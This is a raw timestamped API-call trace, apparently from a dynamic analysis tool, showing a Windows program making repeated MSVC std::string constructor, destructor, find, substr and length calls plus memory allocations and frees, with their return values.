[0227.995] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.995] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.995] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.995] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206ad0
[0227.995] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.995] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.995] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xbb
[0227.995] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.995] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.995] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.995] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206ae0
[0227.995] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.995] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.995] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xc2
[0227.995] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.995] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.995] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.996] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206af0
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.996] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xc5
[0227.996] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.996] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.996] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.996] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b00
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.996] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xc8
[0227.996] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.996] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.996] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.996] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b10
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.996] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xcb
[0227.996] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.996] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.996] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.996] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b20
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.996] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xcd
[0227.996] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.996] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.996] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.996] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b30
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.996] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.996] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xd0
[0227.996] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.996] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.996] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.997] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b40
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.997] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xd3
[0227.997] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.997] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.997] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.997] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b50
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.997] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xd6
[0227.997] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.997] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.997] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.997] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b60
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.997] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xd9
[0227.997] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.997] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.997] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.997] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b70
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.997] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xdc
[0227.997] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.997] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.997] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.997] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b80
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.997] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.997] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xe4
[0227.997] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.998] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.998] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206b90
[0227.998] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.998] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.998] ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z () returned 0xed
[0227.998] ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z () returned 0x19fe2c
[0227.998] ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z () returned 0x19fe4c
[0227.998] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206ba0
[0227.998] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x2
[0227.998] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0xef
[0227.998] ??2@YAPAXI@Z () returned 0x22074a0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22074a0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22074b0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22074c0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22074d0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22074e0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22074f0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207500
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207510
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207520
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207530
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207540
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207550
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207560
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207570
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207580
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207590
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22075a0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22075b0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22075c0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22075d0
[0227.998] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22075e0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22075f0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207600
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207610
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207620
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207630
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207640
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207650
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207660
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207670
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207680
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207690
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22076a0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22076b0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22076c0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22076d0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22076e0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22076f0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207700
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207710
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207720
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207730
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207740
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207750
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207760
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207770
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207780
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2207790
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22077a0
[0227.999] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22077b0
[0227.999] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.999] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.999] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.999] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.999] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.000] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] free (_Block=0x2206890)
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0228.001] free (_Block=0x0)
[0228.001] ??2@YAPAXI@Z () returned 0x2206688
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206688
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206698
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066a8
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066b8
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066c8
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066d8
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066e8
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22066f8
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206708
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206718
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206728
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206738
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206748
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206758
[0228.001] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206768
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206778
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206788
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206798
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067a8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067b8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067c8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067d8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067e8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x22067f8
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206808
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206818
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206828
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206838
[0228.002] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2206848
